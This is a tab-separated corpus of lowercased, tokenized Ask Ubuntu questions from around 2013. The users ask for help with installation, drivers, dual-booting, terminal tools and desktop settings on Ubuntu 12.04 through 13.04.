302546	how to delete a cloud folder but not the locally stored one ?	i have a folder in the cloud . i want to delete it but not the folder on my hard drive . as the storage usage shows , i think the only thing in my account is just the folder reference . i have looked at the faq but can not find anything . just highlighting the entry and pressing delete does not work .
302556	something like driver package for dell vostro 3560 ?	i recently got my dell vostro 3560 , and installed ubuntu 13.04 . since then i reinstalled in multiple times ( unity gone for graphic driver problems ) , had to setup some acpi stuff to get the fan under controll and installed ever more stuff to make the brigthness changing work . i still can not use the dedicated graphic card , can not use that `` cache to ssd '' mechanism used on win7 , can not make palm controll of the touchpad work , left alone disabling the touchpad , can not make my screen extend over to hdmi ( just cloning , but than the upper 100 pixel are missing on the hd-ready tv ) , can not set a reasonable dpi without rendering menues unusable , can not make fingerprint sensors work , can not stop battery being emptied in 50 minutes , multimedia buttons have no function , turboboost wo n't turn on ( i am loosing 1.2ghz ) and so on . so my question is : did i miss something fundamental to make that device run with ubuntu , like getting some driver packages ? is it simply not compatible with ubuntu , or did i get the wrong picture and it is normal that you never stop installing and start using linux ? i mean before i never had a single thought about what makes the screen brightnes controll work - i always simply assumed that an os in 2013 is capable of this out of the box . thanks
302559	how to disable window maximize effect in kubuntu	in 13.04 when you maximize or snap a window to the screen 's borders , instead of instantly changing its size , it does a little animation - it shrinks/expands to the appropriate size . how do i turn this off ? i dug around in effect settings , but nothing there did anything .
302564	how do i do a partition ?	i have a windows 8 acer aspire one ao756 with a 320gb hdd . i am trying to install ubuntu 12.04 from a usb stick and i want to keep windows in case i need it for some programs . i have no idea what to do on the installation type screen . here is what it tells me about the current partition : /dev/sda free space 1mb /dev/sda1 ntfs 419mb 272mb used /dev/sda2 fat32 314mb 50mb used /dev/sda3 134mb unknown used /dev/sda4 ntfs 303000mb 60705mb used /dev/sda5 ntfs 16202mb 13466mb used free space 0mb
302566	how to install dictionaries for goldendict ?	after installing ubuntu 13.04 the possibility to install dictionaries to goldendict is lost . i downloaded a big collection for stardict and usually copied it to the folder : /usr/share/stardict/dic/ . next time after running goldendict it included these dictionaries automatically . after installing 13.04 it does n't work . i pressed f3 , added this folder , selected `` recursive '' , pressed `` update '' ( maybe not precise translation from ukrainian ) - and nothing happened . i tried to copy dictionaries to home folder and added it - nothing happen . what 's wrong ?
302567	installation problem downloading language package	i am installing ubuntu 12.04 version . all i have done partition and also made user name and password but its downloading language pack for 2 hours what i have to do now ?
302568	change k3b behavior when clicking `` open file manager ''	when right clicking a file in k3b and clicking open file manager it attempts to open the file in sublime text ( my default text editor ) . i need it to open in nemo ( my default file manager ) . is there a way to change this setting ?
302570	replace xfce4 with cinnamon without log-in screen	i have a google i/o chrome pixel that i 've been playing around with crouton . this is my frist real shot at ubuntu and have made the upgrade from 12.04 - > 13.04 . using chroot i can run both chrome os and ubuntu side by side and toggle between the two using ctrl-alt-f1 or f3 . because of the chroot , i am not given a login manager meaning i can not change the de . i have installed cinnamon and would like to try it out as default . i tried a cinnamon -- replace which only killed both des . can anyone help with any other ideas ? edit1 : i figured out what my problem was . cinnamon -- replace was failing because i did not have the necessary gnome-themes-* packages installed . sudo apt-get install cinnamon gnome-themes-* xserver-xorg should get everything you need . now , how could i go about making this run from startup ? right now if i end my chroot environment and restart it will still use xfce . i would like cinnamon to be default .
302574	turning off all the anoying password prompts	i recently installed ubuntu 12.04lts . its been 2 days that i 'm looking for a solution for the enormously annoying password prompts . the suggestions that i have found , on all of the forums , did not work for me . i actually tried all off them , reinstalled the os because i could not login any more , ... . now with a new installation , and adjustments to `` sudo visudo '' ( whatever that actually means ) i still do n't like it . adjustments that where made : root all= ( all : all ) all -- > root all= ( all : all ) nopasswd : all % admin all= ( all ) all -- > % admin all= ( all ) nopasswd : all % sudo all= ( all : all ) all -- > % sudo all= ( all : all ) nopasswd : all added line -- > % user_name % all=nopasswd : all is there anything else i can do to relieve this frustration ? ?
302577	open an application without an icon showing up in unity ( ubuntu 12.4 )	i 'm trying to set it up such that after i open pidgin , the application opens without showing an icon in the unity launcher . because pidgin already has a way to open the window through the top-bar , i do n't want the pidgin icon wasting space on the launcher , even after it 's open . i tried modifying the .desktop file as explained in this question , adding this line to my .desktop file : onlyshowin=gnome ; xfce ; kde by this the application will only be shown in gnome , xfce , or kde but not in unity . however it does n't seem to have any effect . is it because pidgin is a special application that also launches through the top-bar or something ? i was able to change the icon and other things , but i ca n't keep it from appearing on the side launcher . thanks in advance .
302583	how can i `` install '' a driver for a usb-to-serial adapter ?	i have a usb-to-serial adapter , belkin f5u109 , that i need to use with ubuntu 12.04 lts . i have found what appears to be a compatible driver , umct.4freebsd.gz ( found here : http : //manpages.ubuntu.com/manpages/precise/en/man4/umct.4freebsd.html ) . it says to `` place '' some `` lines in your kernel configuration file . '' being an absolute novice to ubuntu , i have no clue how to do this , and i ca n't find anything in layman 's terms instructing me on the procedure . can anyone point me in the right direction , please ? thanks !
302586	how to find how much ram my computer has	how do i find out how much ram my computer has ? i am running ubuntu 13.04 .
302589	i do n't have an xorg.conf	i 'm trying to set up my extra mouse buttons but there is no xorg.conf in the etc/x11/ directory . is there something i have to do to create it ? i have n't used ubuntu for a while .
302590	how to install a clock or weather application with gnome 3.8 ?	so i installed gnome 3.8 onto my ubuntu 13.04 pc . it all works pretty fine except for one scrolling problem i resolved . ( as a note , if anyone is having a problem where their scrolling no longer works after installing this , you can fix it in dconf for touchpad ) anyway on to my question . the guide installed gnome shell but i am missing a few applications for it . such as the clock or weather app . i was wondering if anyone knew a way to install these , thanks . i meant to include the guide i used , here it is : http : //www.omgubuntu.co.uk/2013/04/gnome-3-8-ppa-for-ubuntu-gnome
302602	upgrade declined	recently there was a bubble that appeared saying that the new ubuntu upgrade is available , i declined it , clicking do not remind again , i am now having trouble starting and finding the upgrade link , can you point me in the right direction ?
302605	pdfs generated by lyx not searchable in 12.10 or 13.04	i recently updated one of my computers to 12.10 and did a clean install of 13.04 on another , but neither allow me to search a pdf that i exported using lyx ( latex editor ) . i have no problem searching pdf 's exported using texmaker on both computers , and i had no problems searching any pdf before i did the upgrade . update : i 've tried using other pdf readers ( in 13.04 ) with mixed results . document viewer ( once called evince i believe ) and okular have the same issue . i can search them , but only for words/letters that show up in a math environment . i still can not search for words found in standard text environments . however , i was able to install linux versions of adobe reader and foxit reader and while their interfaces are not the best on ubuntu , i am able to search anywhere in the pdf using either application . thoughts ?
302607	convert files to utf-8 without bom	i have a file in hebrew , which is displayed now as gibberish . on windows , what i 've done at the past , i just converted the file using notepad++ > encoding > convert to utf-8 without bom and then hebrew was displayed . on ubuntu if i 'm using notepad++ ( running on wine ) when i convert it , it is still displayed as gibberish ( but success to convert it to utf-8 without bom ) . i wonder if there is a software which converts a file to utf-8 without bom at the same way as notepad++ does ( convert - > hebrew displayed > save ) . i do n't know why it still displays gibberish on notepad + wine when i convert it . wine supports hebrew as i know ( i can write their hebrew and save it without problem ) .
302610	13.04 64 bit / kernel panic after updating ralink rt5390 wifi driver	i 'm running lubuntu 13.04 64 bit . today i installed the official linux driver and related patch for my notebooks ralink rt5390 wifi by following these step outlined on the thread at http : //ubuntuforums.org/showthread.php ? t=2138302 ( post # 4 ) so my wifi is full strength now which is good , but whenever i run spotify , and in some circumstances when using chromium i get a kernel panic and the terminal spits out a bunch of text which means nothing to me . i have checked the logs in /var/log , including kern.log but no mention is made of the crash.rm i have seen some other distros have tools for capturing this information any ideas ?
302611	how to remove the ubuntu one icon from the top bar	ever since i created a ubuntu one account , the top bar has had the little ubuntu one cloud icon in it . i prefer not to have very many icons in the top bar , and since ubuntu one is easy to access , i want to remove it . is there any way i can do this ?
302615	syslinux 4.06 error on boot	i 'm a college student majoring in computer science and i thought it was finally time to switch to a `` computer scientists '' operation system . i decided to try ubuntu first because it seems like the easiest and most popular distro . i made a live usb using lili , univerasl usb installer , and unetbootin . all give me the same error when booting from usb syslinux 4.06 , ( copyright info ) . i have seen that many people have had this problem before and i have n't seen someone post a clear step by step solution yet . when posting your suggestions please remember that i am completely new to this os and please excuse any of inexperience . os : windows 7 model : acer timelinex ect . usb : sandisk 8gb other info : i have tries reformatting and waiting for almost 2 hours . i would make a live cd but i do n't have any clean dvd 's only cd 's and ubuntu cant fit on a standard cd .
302620	trouble installing multicraft	i have been following these directions to get multicraft on my ubuntu vps server by following the linux directions : http : //www.multicraft.org/site/page ? view=install to continue , i need to initialize the database with : http : //your.address/multicraft/ the problem is , when i substitute `` your.address '' for the ip address of the vps server , it just says that it can not connect . what am i doing incorrectly ?
302626	is there a way to send the switch windows signal without `` alt-tab '' ?	i 'm trying to bind a switch window button on my mouse into ubuntu . currently i 'm trying to do it with xbindkeys and xte , but do this in .xbindkeysrc only outputs a tab and does n't switch windows . current .xbindkeysrc code : '' 'xte ' 'keydown alt_l ' 'keydown tab ' 'keyup tab ' 'keyup alt_l ' '' b:10 i am wondering if there is a different command i could put that would directly give instructions to switch windows . edit : i also tried xdotool , here is the code using it : `` xdotool keydown alt key tab & & sleep 1 & & xdotool keyup alt '' b:10 it did n't work either . edit2 : i tried the xdotool one in the command line and it worked . is there some reason it does n't work with xbindkeys ?
302629	how to install extra packages -want konsole	in ubuntu 13.04 , how do i add more apps , like konsole , and where do i get them . i bought a laptop running ubuntu 13.04 , and the usual commands do n't work in gnome-terminal . whould i reinstall ?
302632	vlc wo n't run dvds	just updated to the newest version of ubuntu and now vlc player wo n't read dvds and displays the following message every time i try to play a dvd : playback failure : dvdread could not open the disc `` /dev/dvd '' . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///dev/dvd ' . check the log for details . what actions do i need to take ?
302635	ssh key / password issue	i am running ubuntu 12.04lts . i am trying to upload to github via ssh . i generated my key using keygen , and made sure that github has the key as specified . however , when i try to ssh in i keep getting a ubuntu window opening asking for a password . this is not coming from github , but from the ubuntu system itself . the keys are somehow password protected , which is fine , but i have absolutely no idea what that password might be . it is not my root password . it is not my user password . i never actually set a password for those keys , so i am completely at a loss . i 've tried leaving it blank or just a space , but that does n't work either . i need to either find out what password this is , find a way to reset it to a password that i actually know , or somehow disable it . the only posts i can find on this problem are much older ( 2008 ) , and none of the files they talk about editing exist in 12.04 . editing to clarify one more time . this is a ubuntu issue , not an ssh issue . there is no issue with the key or the remote host . the problem is with ubuntu slapping a password on the use of this key without my knowledge and me having no idea what that password might be or how to reset / disable it .
302640	how do i restore the default settings and video driver after installing nvidia ?	i downloaded nvidia driver from its official site and installed it in 12.04 . but , i did n't notice that my laptop have an intel hd 400 and a gt 620m video card , and ubuntu does support the double video card . after installation , the nvidia card did not work and unity did not work well e.g . unity 3d effects disappeared . i have tried to uninstall the nvidia driver but my desktop is missing , there was only a wallpaper . here 's how i installed the nvidia driver : ctrl+alt+f1 stop lightdm sudo sh xxx.run start lightdm now i want to restore this to the first place . i 'd be grateful for any advice .
302641	stuck on recovery-mode - galaxy nexus ( phone )	i tried to install ubuntu according to instruction given by https : //wiki.ubuntu.com/touch/install however i suck on recovery-mode in the middle of the installation . it seems not [ to be ] running further so i manually enter `` reboot system now '' on the phone screen , then i got a error massage in the computer saying that installation is not completed or similar meaning . current situation of my phone is , can not boot beyond `` google '' [ boot ] screen ; however i still can go into recovery-mode . please help me thanks
302642	how to copy a directory from one hard drive to another with every single file ?	i have a folder i just luckily recovered sitting on : /media/sdc1/pictures with a bunch of subdirectories and files that i need . i want to copy these to a folder on : /media/sdb1/pictures what command do i have to use in the terminal to make sure this happens ? i know there is the cp command . but is that the best choice ? and if so what options should i use to ensure i get every single directory and file ?
302643	how to make a screencast in 13.04 ?	the question explains what is my need . can we make screencast without using additional software other than ffmpeg ? while searching the net , i found a solution . the solution was : ffmpeg -f alsa -i pulse -f x11grab -r 25 -s 1600x900 -i :0.0 -acodec libmp3lame -vcodec huffyuv -delay 10 -sameq screen.avi the problem with this is that , there is no sound , and also that my screen resolution is not supported , which is 1920x1080 . is it possible to have that resolution ? an other problem is that , even for a 2 minute video , the size of the file generated is > 5 gb ? is it possible to compress the video at the creation of the file , or in other words , can the video saving and compression takes place at the same time ? is it possible to redirect the file to be saved to some other location ? the current location is my home folder . is it possible change the location , or redirect it to another location ?
302649	ubuntu 13.04 put resolution at 1024x768	after the installation of ubuntu 13.04 , i have the resolution at 1024x768 instead of 1280x800 , and even after switching all the possible drivers in settings , the situation does n't change . plus , this problem makes it impossible to see the launcher and all the unity/compiz things . if i solve this with the dconf command i could try to fix this , but i can not at 1024 , i need the 1280x800 resolution . my computer : sony vaio fz21m intel ccore 2 duo nvidia geforce 8400m gt
302660	after installation of ubuntu , vmware now not showing it , why ?	have a look at the images i installed ubuntu 12.04 64 bit on this vmware 9.0 workstation and it ran well 2-3 times but now when i run vmware workstation or player , it 's not showing ubuntu . where has ubuntu gone ?
302662	reattaching to an existing screen session	i have a program running under screen . in fact , when i detach from the session and check netstat , i can see the program is still running ( which is what i want ) : udp 0 0 127.0.0.1:1720 0.0.0.0 : * 3759/ruby now i want to reattach to the session running that process . so i start up a new terminal , and type screen -r $ screen -r there are several suitable screens on : 5169.pts-2.teamviggy ( 05/31/2013 09:30:28 pm ) ( detached ) 4872.pts-2.teamviggy ( 05/31/2013 09:25:30 pm ) ( detached ) 4572.pts-2.teamviggy ( 05/31/2013 09:07:17 pm ) ( detached ) 4073.pts-2.teamviggy ( 05/31/2013 08:50:54 pm ) ( detached ) 3600.pts-2.teamviggy ( 05/31/2013 08:40:14 pm ) ( detached ) type `` screen [ -d ] -r [ pid . ] tty.host '' to resume one of them . but how do i know which one is the session running that process i created ? now one of the documents i came across said : '' when you 're using a window , type c-a a to give it a name . this name will be used in the window listing , and will help you remember what you 're doing in each window when you start using a lot of windows . '' the thing is when i am in a new screen session , i try to press control+a a and nothing happens .
302667	shorten file path in terminal	i would like to shorten the file path that is currently active in the terminal to allow more space . this is a shortened example but i sometimes have filepaths that i am working with that are 6 levels deep and it would be nice to hide that . test @ ubuntu : ~ $ cd code/helloworld test @ ubuntu : ~/code/helloworld $ would like to just see somehting like helloworld : any ideas ? thanks !
302668	move multiple files to multiple folders based on names of files	i have a bunch of files in one folder named numeric as 001001 .. 001002 .. 002001 .. 002002 .. and so on until 114001 .. 114002 , i want to move every group of files that start with the same number to one folder , all files with 001 to folder 1 , all files with 110 to folder 110 and so on , no problem in creating the folders i have a problem in moving files in the sub folders in one step , hope some one help me to do that
302680	how do i install ubuntu alongside uefi enabled windows 8 ?	i recently ( about a month ago ) bought a dell xps 8500 desktop with uefi enabled windows 8 pro pre-installed . i am trying to install ubuntu 13.04 64-bit dualboot with windows on this computer . i do n't know much about uefi , but i think i followed the correct instructions to do this installation . here 's what i 've done so far : i have a 256gb ssd drive with the windows os partition and a 1tb drive for data . i created a 100gb partition on the 1tb drive for ubuntu . this was done through windows disk management . i downloaded ubuntu and created a bootable usb as per the instructions on the ubuntu website . i tried installing ubuntu through the usb . problem : while installation , i do not see a `` install alongside windows 8 '' option like i have usually seen in all my previous installs . now , i do n't know if this has to do with uefi and i do n't know much about that anyway . question : how should i proceed with the installation ? i am currently on the same computer through windows . i also have access to a laptop with windows 8 pro ( possibly not enabled with uefi - it 's an old computer with newly installed os ) alongwith ubuntu 12.10 dualboot . let me also add that my secure boot is on . i also tried it with secureboot off , but did n't work . i followed all the steps mentioned here in order : installing ubuntu on a pre-installed uefi supported windows 8 system edit : i `` tried '' ubuntu without installing it via the liveusb . it is not able to access any of the drives . do you think that has anything to do with this issue ? any help would really be appreciated . thank you so much .
302681	ubuntu 12.04 ethernet is not working ?	i recently installed ubuntu 12.04 lts , and have tried every method out there to get my ethernet cable to work ... unfortunately not one of the methods out there worked for me . here are some of the tests i ran : lspci -nnk | grep -i ethernet gives 05:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) . ifconfig gives : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:803 errors:0 dropped:0 overruns:0 frame:0 tx packets:803 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:103034 ( 103.0 kb ) tx bytes:103034 ( 103.0 kb ) wlan0 link encap : ethernet hwaddr 08:60:6e : cd : f6 : f3 inet addr:192.168.2.101 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a60:6eff : fecd : f6f3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3130 errors:0 dropped:0 overruns:0 frame:0 tx packets:3156 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen : `1000 rx bytes:3869261 ( 3.8 mb ) tx bytes:381110 ( 381.1 kb ) lshw -c network : *-network unclaimed description : ethernet controller product : ar8161 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:05:00.0 version : 10 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list configuration : latency=0 resources : memory : f7200000-f723ffff ioport : d000 ( size=128 ) *-network description : wireless interface physical id : 2 bus info : usb @ 5:2 logical name : wlan0 serial : 08:60:6e : cd : f6 : f3 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.5.0-23-generic firmware=n/a ip=192.168.2.101 link=yes multicast=yes wireless=ieee 802.11bgn what can i do ?
302696	bash script source : no such file or directory	i have a script that begin like this # ! /bin/bash valkyrie=~/myprojects/valkyrie source $ valkyrie/cluster.conf but when i run it it returns line 2 : ~/myprojects/valkyrie/cluster.conf : no such file or directory but the file exist and when i run source ~/myprojects/valkyrie/cluster.conf it runs fine . any idea ? i set valkyrie variable elsewhere so hard-code in the path is n't an option .
302697	why the used-space of `` df -h '' is larger than the result of `` du -hs / '' ?	the result of `` df -h '' shows below : /dev/sda1 5.6g 3.2g 2.2g 60 % / udev 992m 4.0k 992m 1 % /dev tmpfs 401m 752k 401m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1002m 0 1002m 0 % /run/shm the result of `` du -hs / '' shows below : 1.7g / why is that ?
302700	no usb tethering possible with galaxy s3	i have a galaxy s3 ( sgh-i747 ; android 4.1.1 ; at & t ) and a galaxy note ( sgh-i717 ; android 4.1.2 ; at & t ) . they are both on the same at & t family plan , which includes the tethering/wi-fi hot-spot ( i.e . no need to root the phone ) . the wi-fi hot-spot works with both phones to connect my laptop ( ubuntu 12.10 ; asus a53e ) . but i can only use the usb tethering with the galaxy note . any problems with the gs3 i do n't know of ?
302704	how do i restore ubuntu 's default interface ?	when i downloaded and install nvidia drivers , both the top bar and bottom bar disappeared . when i removed them , some applications worked , but the bars are still missing and fancy shortcuts such as alt+tab do n't work . thus , i 'm not sure how i can restore a screen i minimized . how do i restore it as it was , or should i use this time as opportunity for change ?
302706	how to fix dpkg : error processing fusion-icon ?	this is what i got after upgrading ubuntu 12.10 to ubuntu 13.04 : santos @ santos : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up fusion-icon ( 0.1.0-2ubuntu2 ) ... traceback ( most recent call last ) : file `` /usr/bin/pycentral '' , line 2372 , in main ( ) file `` /usr/bin/pycentral '' , line 2366 , in main rv = action.run ( global_options ) file `` /usr/bin/pycentral '' , line 1529 , in run self.options.exclude , byte_compile_default=true ) file `` /usr/bin/pycentral '' , line 1097 , in install rt.byte_compile ( linked_files , bc_option , exclude_regex , ignore_errors ) file `` /usr/bin/pycentral '' , line 231 , in byte_compile shell=false , stdin=subprocess.pipe ) file `` /usr/lib/python2.7/subprocess.py '' , line 711 , in __ init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1308 , in _execute_child raise child_exception oserror : [ errno 2 ] no such file or directory dpkg : error processing fusion-icon ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for menu ... errors were encountered while processing : fusion-icon e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anyone help me to fix this ?
302708	installing ubuntu studio aside ubuntu 13.04	i was just wondering if i could install ubuntu studio without getting rid of ubuntu 13.04 ? i 'm not looking to dual boot , just want to see if its possible to install studio on top of 13.04 . thanks in advance
302711	trying to install razer device configuration tool	it can be found here . i followed the directions in the readme file but i do n't see the application anywhere . i realize this is n't a lot to go on , i 'm new to ubuntu and linux in general . if you need anymore information please let me know . thanks
302719	wine video resolution deteriorates after installing ubuntu 13.04	since upgrading to ubuntu 13.04 from the previous version , i noted that the graphics of the cards on the windows card games look more grainy , but what is worse is that small icons in the toolbar of some windows program have become unreadable , which is a pain . i have tried to change the resolution in wine but that only changes the font size ; installed all the windows fonts in wine through winetricks , have activated font smoothing , all to no avail . i am not sure what the problem is ; there are no video issues in any linux programs , so this must be a wine related problem .
302729	can not get usb gamepad to work in ubuntu 12.04	i 'm trying to get a cheap usb gamepad to work under ubuntu 12.04 running on my arm chromebook ( using chroot ) . after plugging in the gamepad , dmesg shows : [ 5879.411510 ] usb 2-1 : new low-speed usb device number 8 using exynos-ohci [ 5879.610530 ] usb 2-1 : new usb device found , idvendor=0079 , idproduct=0011 [ 5879.610560 ] usb 2-1 : new usb device strings : mfr=0 , product=2 , serialnumber=0 [ 5879.610584 ] usb 2-1 : product : usb gamepad output of lsusb is : bus 001 device 003 : id 0424:3503 standard microsystems corp . bus 002 device 008 : id 0079:0011 dragonrise inc. gamepad bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 006 : id 2232:1037 i do n't have /dev/input/ls0 ls -l /dev/input : drwxr-xr-x 2 root root 120 may 31 17:24 by-path crw-rw -- -- 1 root 222 13 , 64 may 31 17:24 event0 crw-rw -- -- 1 root 222 13 , 65 may 31 17:24 event1 crw-rw -- -- 1 root 222 13 , 66 may 31 17:24 event2 crw-rw -- -- 1 root 222 13 , 67 may 31 17:24 event3 crw-rw -- -- 1 root 222 13 , 68 may 31 17:24 event4 crw-rw -- -- 1 root 222 13 , 69 may 31 17:24 event5 any ideas ? edit : in case it helps here 's what i see in usb-devices : t : bus=02 lev=01 prnt=01 port=00 cnt=01 dev # = 2 spd=1.5 mxch= 0 d : ver= 1.00 cls=00 ( > ifc ) sub=00 prot=00 mxps= 8 # cfgs= 1 p : vendor=0079 prodid=0011 rev=01.06 s : product=usb gamepad c : # ifs= 1 cfg # = 1 atr=80 mxpwr=100ma i : if # = 0 alt= 0 # eps= 1 cls=03 ( hid ) sub=00 prot=00 driver=usbhid edit2 : here 's the output of lsusb -v ( the section for the gamepad ) bus 002 device 002 : id 0079:0011 dragonrise inc. gamepad could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 1.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x0079 dragonrise inc. idproduct 0x0011 gamepad bcddevice 1.06 imanufacturer 0 iproduct 2 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 34 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 0 no subclass binterfaceprotocol 0 none iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.10 bcountrycode 33 us bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 101 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 10
302736	solarized color name not defined	i recently installed the solarized theme for gnome-terminal in ubuntu 12.04 , but now , every time i used vim , i receive the warning `` warning : color name `` s_base03 '' is not defined '' . this warning is printed whether or not i am using the solarized colorscheme for vim . otherwise , everything else seems normal . any clue why i might be getting this error ? thanks !
302738	sound output problem on hp pavillion g6 2229tu in ubuntu 10.04	how can i solve sound output problem on hp pavilion g6 2229tu in ubuntu 10.04 ? give some reliable answer .
302741	arte - how to download rtmp or find the mp4 links	so i 've found this , the xml page for the video i want to download liveweb and on that page there is this rtmp : //arte.fcod.llnwd.net/a2306/o25/mp4 : liveweb/stream/5030_deca_dance_25fps_la_batsheva_24_images_hd.mp4 ? e=1385247600 & h=a6f3d498e98f267cb4318f30d48479a0 i thought i could stream/save this through vlc , but that does n't work or i thought i might be able to see a direct mp4 link in there but cant seem to do this either any help appreciated thanks
302742	unable to install mysql server on ubuntu	the error i encountered while updating in ubuntu 11.10. since i found that ubuntu 11.10 supports much better than 12.04 for matlab , i have rebooted my os to ubuntu 11.10 . and even here , i face same problem . i feel this must be a trouble from oneiric sudo apt-get update err http : //in.archive.ubuntu.com oneiric inrelease err http : //in.archive.ubuntu.com oneiric-updates inrelease err http : //in.archive.ubuntu.com oneiric-backports inrelease err http : //in.archive.ubuntu.com oneiric-proposed inrelease err http : //in.archive.ubuntu.com oneiric release.gpg unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.92.156 80 ] err http : //in.archive.ubuntu.com oneiric-updates release.gpg unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.92.156 80 ] err http : //in.archive.ubuntu.com oneiric-backports release.gpg unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.92.156 80 ] err http : //extras.ubuntu.com oneiric inrelease err http : //in.archive.ubuntu.com oneiric-proposed release.gpg unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.92.156 80 ] err http : //extras.ubuntu.com oneiric release.gpg unable to connect to extras.ubuntu.com : http : err http : //security.ubuntu.com oneiric-security inrelease err http : //security.ubuntu.com oneiric-security release.gpg unable to connect to security.ubuntu.com : http : [ ip : 91.189.91.14 80 ] err http : //archive.ubuntu.com oneiric inrelease err http : //archive.ubuntu.com oneiric release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] reading package lists ... done w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric-updates/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric-proposed/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric/release.gpg unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.92.156 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric-updates/release.gpg unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.92.156 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric-backports/release.gpg unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.92.156 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric-proposed/release.gpg unable to connect to in.archive.ubuntu.com : http : [ ip : 91.189.92.156 80 ] w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release.gpg unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/release.gpg unable to connect to security.ubuntu.com : http : [ ip : 91.189.91.14 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . /etc/apt/sources.list # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / dists/oneiric/main/binary-i386/ # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / oneiric main restricted deb-src http : //archive.ubuntu.com/ubuntu oneiric main restricted # added by software-properties deb http : //in.archive.ubuntu.com/ubuntu/ oneiric main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ oneiric restricted main multiverse # added by software-properties deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ oneiric-updates restricted main multiverse # added by software-properties deb http : // in.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-backports main restricted multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ oneiric-backports main restricted multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security restricted main multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu oneiric-security multiverse # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner deb http : //extras.ubuntu.com/ubuntu oneiric main deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-proposed restricted main multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ oneiric-proposed restricted main multiverse # added by software-properties deb-src http : //extras.ubuntu.com/ubuntu oneiric main
302749	heating problems in hp pavilion g6 amd vision a10	i have istalled tlp and amd propreitary drivers ( amd catalyst ) . but still the heating problem persists . installing the above 2 helped a little by cooling to 3-5 degrees . but still the cpu temp is greater than 60 degrees . and battery is draining much fast than windows 8 .
